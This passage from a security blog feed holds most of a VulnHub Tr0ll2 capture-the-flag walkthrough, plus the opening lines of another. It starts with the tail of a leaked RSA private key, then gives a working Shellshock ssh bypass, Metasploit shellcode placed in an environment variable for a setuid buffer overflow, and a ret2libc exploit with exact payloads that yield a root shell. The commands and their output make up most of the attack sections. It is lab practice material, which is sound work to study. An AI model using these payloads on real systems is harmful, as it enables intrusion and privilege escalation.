</span><span class='line'>ywLymdDOlq3TOZ+CySD4/wUCgYEAr/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG
</span><span class='line'>th8mjrEwf/b/1yai2YEHn+QKUU5dCbOLOjr2We/Dcm6cue98IP4rHdjVlRS3oN9s
</span><span class='line'>G9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye
</span><span class='line'>q51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4/fC77+NO
</span><span class='line'>vW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot/W3IiRlkobhO07p3nj601d+OgTjjgKG
</span><span class='line'>zp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==
</span><span class='line'>-----END RSA PRIVATE KEY-----</span></code></pre></td></tr></table></div></figure>


<h2>Breaking into shell? Shock(ing)!</h2>

<p>Sweet, let&rsquo;s use it to log-in via <code>ssh</code>. But what username should we use? Let&rsquo;s try <code>noob</code>.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# ssh noob@172.16.246.135 -i noob 
</span><span class='line'>TRY HARDER LOL!
</span><span class='line'>Connection to 172.16.246.135 closed.</span></code></pre></td></tr></table></div></figure>


<p>What the hell?! The connection is closed straight away. Okay, I know few workarounds for it&hellip; Let&rsquo;s try calling different shell at the log-in:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# ssh noob@172.16.246.135 -i noob -t "/bin/sh"
</span><span class='line'>TRY HARDER LOL!
</span><span class='line'>Connection to 172.16.246.135 closed.</span></code></pre></td></tr></table></div></figure>


<p>Nope. How about starting shell without the &lsquo;rc&rsquo; profile:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# ssh noob@172.16.246.135 -i noob -t "bash --noprofile"
</span><span class='line'>TRY HARDER LOL!
</span><span class='line'>Connection to 172.16.246.135 closed.</span></code></pre></td></tr></table></div></figure>


<p>Arrrghhh! It&rsquo;s getting annoying. What&rsquo;s other way I can bypass that&hellip;? And then it hit me - how could I forget about it (it kept me up at night for much longer than I would&rsquo;ve like), ladies and gentleman - SHELLSHOCK!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# ssh noob@172.16.246.135 -i noob -t "() { :; }; /bin/bash"
</span><span class='line'>noob@Tr0ll2:~$ </span></code></pre></td></tr></table></div></figure>


<p>Sweeeeeeeet, we&rsquo;re in! :D</p>

<h2>Exploiting buffer overflow</h2>

<p>After a bit of a poking around we can quickly find an interesting folder with even more interesting files:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:~$ cd /nothing_to_see_here/choose_wisely/
</span><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls
</span><span class='line'>door1  door2  door3
</span><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls -al *
</span><span class='line'>door1:
</span><span class='line'>total 16
</span><span class='line'>drwsr-xr-x 2 root root 4096 Oct  4 22:19 .
</span><span class='line'>drwsr-xr-x 5 root root 4096 Oct  4 22:36 ..
</span><span class='line'>-rwsr-xr-x 1 root root 7271 Oct  4 22:19 r00t
</span><span class='line'>
</span><span class='line'>door2:
</span><span class='line'>total 20
</span><span class='line'>drwsr-xr-x 2 root root 4096 Oct  5 21:19 .
</span><span class='line'>drwsr-xr-x 5 root root 4096 Oct  4 22:36 ..
</span><span class='line'>-rwsr-xr-x 1 root root 8401 Oct  5 21:17 r00t
</span><span class='line'>
</span><span class='line'>door3:
</span><span class='line'>total 16
</span><span class='line'>drwsr-xr-x 2 root root 4096 Oct  5 21:18 .
</span><span class='line'>drwsr-xr-x 5 root root 4096 Oct  4 22:36 ..
</span><span class='line'>-rwsr-xr-x 1 root root 7273 Oct  5 21:18 r00t</span></code></pre></td></tr></table></div></figure>


<p>Three binaries owned by root with a &lsquo;sticky bit&rsquo; set! Seems like we should be able to get our privilege escalation through it.</p>

<p>But that&rsquo;s where the trolls hit again, only one of these binaries is actually useful, other two are just trolling with you - one of them reboots the VM and the other puts you in a restricted shell for a limited period of time. The one of interest that we&rsquo;ll be exploiting is the biggest one. Also, it seems that periodically the binaries are shuffled around the directories (once it&rsquo;s <code>door1</code>, then maybe <code>door3</code> etc.), so make sure to always keep an eye on the size of the binary you&rsquo;re working on.</p>

<p>Alright, let&rsquo;s get to the fun part! First, let&rsquo;s run the right binary and see what it does.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t 
</span><span class='line'>Usage: ./r00t input
</span><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t AAAAAAAAAAAAAA
</span><span class='line'>AAAAAAAAAAAAAA</span></code></pre></td></tr></table></div></figure>


<p>OK, it seems like it&rsquo;s just replaying the input. Let&rsquo;s pass in something big.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t $(python -c 'print "A" * 400')
</span><span class='line'>Segmentation fault</span></code></pre></td></tr></table></div></figure>


<p>Hahaaa! Hello seg-fault, I was expecting you. Let&rsquo;s find out can we overwrite return address and what&rsquo;s the offset.</p>

<p>As always, best tool for the job - <code>pattern_create.rb</code> in metasploit tools.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:/usr/share/metasploit-framework/tools# ./pattern_create.rb 400
</span><span class='line'>Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A</span></code></pre></td></tr></table></div></figure>


<p>Conveniently <code>gdb</code> is installed on the host, so we can do our debugging in there. Let&rsquo;s find the offset!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A
</span><span class='line'>Starting program: /nothing_to_see_here/choose_wisely/door3/r00t Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A
</span><span class='line'>
</span><span class='line'>Program received signal SIGSEGV, Segmentation fault.
</span><span class='line'>0x6a413969 in ?? ()</span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:/usr/share/metasploit-framework/tools# ./pattern_offset.rb 6a413969
</span><span class='line'>[*] Exact match at offset 268
</span><span class='line'>root@kali:/usr/share/metasploit-framework/tools# </span></code></pre></td></tr></table></div></figure>


<p>Cool! So we need to overwrite 268 bytes to get to the EIP. Let&rsquo;s see what protections are enabled using another useful tool <code>checksec.sh</code>, copy it onto the host and see what it&rsquo;ll tell us about our binary:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ~/checksec.sh --file r00t 
</span><span class='line'>RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
</span><span class='line'>Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   r00t</span></code></pre></td></tr></table></div></figure>


<p>Awesome! Pretty much everything disabled - that should be easy :) And since we&rsquo;re on 32 bit machine, just a quick precautionary increase of the stack size to &lsquo;disable&rsquo; ASLR to prevent messing with our addresses.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ uname -a
</span><span class='line'>Linux Tr0ll2 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
</span><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ulimit -s unlimited</span></code></pre></td></tr></table></div></figure>


<p>We&rsquo;re good to go! There are couple methods how we can exploit it and I&rsquo;ll describe two that came to my mind straight away - putting a shellcode in an environment variable and ret2libc. Let&rsquo;s do it!</p>

<h2>Buffer overflow with payload in an environment variable</h2>

<p>Since NX is disabled, we can execute code from anywhere, including .data section. That makes it pretty simple, we can put the shellcode we want to run in an environment variable and overwrite EIP with address of the shellcode.</p>

<p>First, let&rsquo;s create a shellcode with Metasploit.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>msf &gt; use payload/linux/x86/exec 
</span><span class='line'>msf payload(exec) &gt; show options
</span><span class='line'>
</span><span class='line'>Module options (payload/linux/x86/exec):
</span><span class='line'>
</span><span class='line'>   Name  Current Setting  Required  Description
</span><span class='line'>   ----  ---------------  --------  -----------
</span><span class='line'>   CMD                    yes       The command string to execute
</span><span class='line'>
</span><span class='line'>msf payload(exec) &gt; set CMD /bin/sh
</span><span class='line'>CMD =&gt; /bin/sh
</span><span class='line'>msf payload(exec) &gt; generate -b '\x00' -s 50
</span><span class='line'># linux/x86/exec - 120 bytes
</span><span class='line'># http://www.metasploit.com
</span><span class='line'># Encoder: x86/shikata_ga_nai
</span><span class='line'># NOP gen: x86/opty2
</span><span class='line'># VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
</span><span class='line'># PrependSetreuid=false, PrependSetuid=false, 
</span><span class='line'># PrependSetresgid=false, PrependSetregid=false, 
</span><span class='line'># PrependSetgid=false, PrependChrootBreak=false, 
</span><span class='line'># AppendExit=false, CMD=/bin/sh
</span><span class='line'>buf = 
</span><span class='line'>"\xb4\xbb\x46\x02\xd4\x35\x05\xf8\xbf\x4a\x1d\xb1\x93\xa8" +
</span><span class='line'>"\x24\x3f\x91\x27\x2f\xb2\x41\x42\x34\x77\x13\xfd\xb0\x9b" +
</span><span class='line'>"\xb6\x99\x4f\x0c\x3d\x66\x3c\xba\xb9\x43\xb5\x8d\xb7\x14" +
</span><span class='line'>"\x96\x97\xb3\x37\x49\xf9\x4b\x40\xb8\xd9\xf7\xa2\xd9\xdd" +
</span><span class='line'>"\xc7\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x0b\x31\x45\x15\x03" +
</span><span class='line'>"\x45\x15\x83\xc5\x04\xe2\x2c\x9d\xa9\x81\x57\x30\xc8\x59" +
</span><span class='line'>"\x4a\xd6\x9d\x7d\xfc\x37\xed\xe9\xfc\x2f\x3e\x88\x95\xc1" +
</span><span class='line'>"\xc9\xaf\x37\xf6\xc2\x2f\xb7\x06\xfc\x4d\xde\x68\x2d\xe1" +
</span><span class='line'>"\x48\x75\x66\x56\x01\x94\x45\xd8"</span></code></pre></td></tr></table></div></figure>


<p>Calling <code>generate</code> with <code>-b '\x00'</code> to avoid NULL bytes that could mess up our exploit and <code>-s 50</code> to include 50 byte NOP sled. This will help us locating the shellcode in the memory as we won&rsquo;t need to provide exact address where the shellcode starts, but just a rough vicinity (we can land anywhere on NOPs).</p>

<p>Let&rsquo;s put the shellcode in the environment.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ export EGG=$(python -c 'print "\xb4\xbb\x46\x02\xd4\x35\x05\xf8\xbf\x4a\x1d\xb1\x93\xa8\x24\x3f\x91\x27\x2f\xb2\x41\x42\x34\x77\x13\xfd\xb0\x9b\xb6\x99\x4f\x0c\x3d\x66\x3c\xba\xb9\x43\xb5\x8d\xb7\x14\x96\x97\xb3\x37\x49\xf9\x4b\x40\xb8\xd9\xf7\xa2\xd9\xdd\xc7\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x0b\x31\x45\x15\x03\x45\x15\x83\xc5\x04\xe2\x2c\x9d\xa9\x81\x57\x30\xc8\x59\x4a\xd6\x9d\x7d\xfc\x37\xed\xe9\xfc\x2f\x3e\x88\x95\xc1\xc9\xaf\x37\xf6\xc2\x2f\xb7\x06\xfc\x4d\xde\x68\x2d\xe1\x48\x75\x66\x56\x01\x94\x45\xd8"')</span></code></pre></td></tr></table></div></figure>


<p>And it&rsquo;s in! Now all we need to do, is find its address and overwrite EIP with it. To do it, let&rsquo;s reach to yet another tool in my arsenal - simple C code to locate environment variables.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class='c'><span class='line'><span class="cp">#include &lt;unistd.h&gt;</span>
</span><span class='line'>
</span><span class='line'><span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
</span><span class='line'><span class="p">{</span>
</span><span class='line'>    <span class="n">printf</span><span class="p">(</span><span class="s">&quot;EGG address 0x%lx</span><span class="se">\n</span><span class="s">&quot;</span><span class="p">,</span> <span class="n">getenv</span><span class="p">(</span><span class="s">&quot;EGG&quot;</span><span class="p">));</span>
</span><span class='line'>    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span><span class='line'><span class="p">}</span>
</span></code></pre></td></tr></table></div></figure>


<p>Copy it across, compile and run to find the address of our EGG (shellcode).</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ~/egghunt 
</span><span class='line'>EGG address 0xbffffe57</span></code></pre></td></tr></table></div></figure>


<p>Alright, so we have the address of the EGG, let&rsquo;s try to exploit it! Again, we need to overwrite 268 bytes to get to EIP and then pass in address of our shellcode.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ./r00t $(python -c 'print "A" * 268 + "\x57\xfe\xff\xbf"')
</span><span class='line'>Segmentation fault
</span><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ./r00t $(python -c 'print "A" * 268 + "\x67\xfe\xff\xbf"')
</span><span class='line'># whoami
</span><span class='line'>root</span></code></pre></td></tr></table></div></figure>


<p>Voila! :) Needed to adjust address of shellcode a little bit, but thanks to NOP sled we got it on a second try - that was pretty simple. Let&rsquo;s now have a look at ret2libc option (my personal favourite).</p>

<h2>Ret2libc</h2>

<p>So, with ret2libc things are a little bit different. If NX was enabled, it would mean we can only execute code from executable sectors of the program and the approach described above wouldn&rsquo;t work.</p>

<p>In order to bypass this, we can utilise functions in the C libraries that are generally loaded by majority of the programs. One particular function we would want to use is <code>system()</code> that invokes system commands passed in. Because it takes a parameter, we need to create a fake stack frame to make it look like it&rsquo;s really a function being called.</p>

<p>Essentially, we want to make the stack look as follows:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>.
</span><span class='line'>                -- Current --                    -- Target --
</span><span class='line'>     0000
</span><span class='line'>             ------------------               ------------------
</span><span class='line'>             |                |               |                |
</span><span class='line'>             |                |               | AAAAAAAAAAAAAA |
</span><span class='line'>       ^     |     Buffer     |               | AAAAAAAAAAAAAA |   
</span><span class='line'>       |     |                |   268 bytes   | AAAAAAAAAAAAAA |  Overflow buffer with dummy data
</span><span class='line'>     stack   |                |               | AAAAAAAAAAAAAA |
</span><span class='line'>     growth  ------------------               | AAAAAAAAAAA... |
</span><span class='line'>       |     |  Base pointer  |               |                |  
</span><span class='line'>       |     ------------------               ------------------
</span><span class='line'>             | Return address |    4 bytes    |    system()    |   system() call
</span><span class='line'>             ------------------               ------------------
</span><span class='line'>             |                |    4 bytes    |      BBBB      |   dummy return from system()
</span><span class='line'>             |  Rest of the   |               ------------------
</span><span class='line'>             |     stack      |    4 bytes    | /bin/sh (&EGG) |   address of the EGG environment variable
</span><span class='line'>             |                |               ------------------   containing string argument passed to system()
</span><span class='line'>             |      ...       |               |       ...      |
</span><span class='line'>     FFFF</span></code></pre></td></tr></table></div></figure>


<p>First, let&rsquo;s get the address of <code>system</code> using <code>gdb</code></p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ gdb r00t 
</span><span class='line'>GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
</span><span class='line'>Copyright (C) 2012 Free Software Foundation, Inc.
</span><span class='line'>License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
</span><span class='line'>This is free software: you are free to change and redistribute it.
</span><span class='line'>There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
</span><span class='line'>and "show warranty" for details.
</span><span class='line'>This GDB was configured as "i686-linux-gnu".
</span><span class='line'>For bug reporting instructions, please see:
</span><span class='line'>&lt;http://bugs.launchpad.net/gdb-linaro/&gt;...
</span><span class='line'>Reading symbols from /nothing_to_see_here/choose_wisely/door3/r00t...done.
</span><span class='line'>(gdb) run
</span><span class='line'>Starting program: /nothing_to_see_here/choose_wisely/door3/r00t 
</span><span class='line'>Usage: /nothing_to_see_here/choose_wisely/door3/r00t input
</span><span class='line'>[Inferior 1 (process 2379) exited normally]
</span><span class='line'>(gdb) p system
</span><span class='line'>$1 = {&lt;text variable, no debug info&gt;} 0x40069060 &lt;system&gt;</span></code></pre></td></tr></table></div></figure>


<p>Cool, we know where the system function call resides (0x40069060), now - what do we want to call? How about <code>/bin/sh</code>? There&rsquo;s one problem though - when passing it as an argument to <code>system()</code>, we need to pass an address of the string going in as argument.</p>

<p>There are couple of options - we can either try to find it in existing environment variables (but it may be hard as the string we want may not be there and we would need to be exact regarding its memory address to be able to extract it) or we can simply create new environment variable with whatever value we want and pass that in!</p>

<p>Going with the second option, we control what value we want to pass in and we can also do a variety of a NOP sled as in the previous example.</p>

<p>As before, let&rsquo;s create an environment variable to use as an argument to our <code>system()</code> call.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ export EGG=//////////////////////////////////////////////////////bin/sh</span></code></pre></td></tr></table></div></figure>


<p>Number of <code>/</code> acts as a NOP sled, we can land anywhere on them and the exploit will still work, thus, we don&rsquo;t need to be super specific about the string&rsquo;s memory location.</p>

<p>Now we just need it&rsquo;s address and we are ready to rock! Let&rsquo;s use the same <code>egghunt</code> program as in the previous example.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door3$ ~/egghunt 
</span><span class='line'>EGG address 0xbffffe93</span></code></pre></td></tr></table></div></figure>


<p>Awesome! Let&rsquo;s craft our exploit - again, we&rsquo;ll need (in sequence):</p>

<ul>
<li>268 bytes of dummy data</li>
<li>address of system</li>
<li>4 bytes of dummy data</li>
<li>address of /bin/sh string</li>
</ul>


<p>Let&rsquo;s do it!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t $(python -c 'print "A" * 268 + "\x60\x90\x06\x40" + "BBBB" + "\x93\xfe\xff\xbf"')
</span><span class='line'>Segmentation fault
</span><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t $(python -c 'print "A" * 268 + "\x60\x90\x06\x40" + "BBBB" + "\xa3\xfe\xff\xbf"')
</span><span class='line'>sh: 1: s/0: not found
</span><span class='line'>Segmentation fault
</span><span class='line'>noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t $(python -c 'print "A" * 268 + "\x60\x90\x06\x40" + "BBBB" + "\xb3\xfe\xff\xbf"')
</span><span class='line'># whoami
</span><span class='line'>root
</span><span class='line'># </span></code></pre></td></tr></table></div></figure>


<p>Got it! On the 3rd try, didn&rsquo;t seem to be able to guess EGG address that effectively this time, but at the end of the day it worked! :) Now you see why having a decent size NOP sled helps, otherwise, we would need to find <em>EXACT</em> address where it starts&hellip; in some situations it could be pretty hard if not impossible to do!</p>

<p>Oh, right, let&rsquo;s get the flag!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'># cd /root
</span><span class='line'># ls
</span><span class='line'>core1  core2  core3  core4  goal  hardmode  lmao.zip  Proof.txt  ran_dir.py  reboot
</span><span class='line'># cat Proof.txt
</span><span class='line'>You win this time young Jedi...
</span><span class='line'>
</span><span class='line'>a70354f0258dcc00292c72aab3c8b1e4  </span></code></pre></td></tr></table></div></figure>


<h2>Summary</h2>

<p>Quite fun challange! Was a bit frustrating at times, especially at the password guessing bit for FTP server, if only &ldquo;Tr0ll&rdquo; was one of the entries in the answer.txt file, that would save me quite some time trying to guess FTP username and password&hellip; oh well, Trolls will be Trolls :) Thanks <a href="https://twitter.com/maleus21">Maleus</a> for coming up with it and <a href="http://www.vulnhub.com">VulnHub</a> for hosting it!</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Knock-Knock VM Walkthrough]]></title>
    <link href="http://blog.knapsy.com/blog/2014/10/16/knock-knock-vm-walkthrough/"/>
    <updated>2014-10-16T15:29:15+11:00</updated>
    <id>http://blog.knapsy.com/blog/2014/10/16/knock-knock-vm-walkthrough</id>
    <content type="html"><![CDATA[<p>Just after awesome weekend hacking away at <a href="http://ruxcon.org.au">Ruxcon</a>, <a href="http://vulnhub.com">VulnHub</a> delivered yet another boot2root VM - wow, that&rsquo;s been busy (and fun) last couple of weeks! Good practice for another big CTF that is coming up for me very soon&hellip;</p>

<p>Anyway, without too much of an intro, let&rsquo;s get to it!</p>

<!-- more -->


<h2>Recon</h2>

<p>So, as always, start up the pwn-able VM, Kali and get to work.</p>

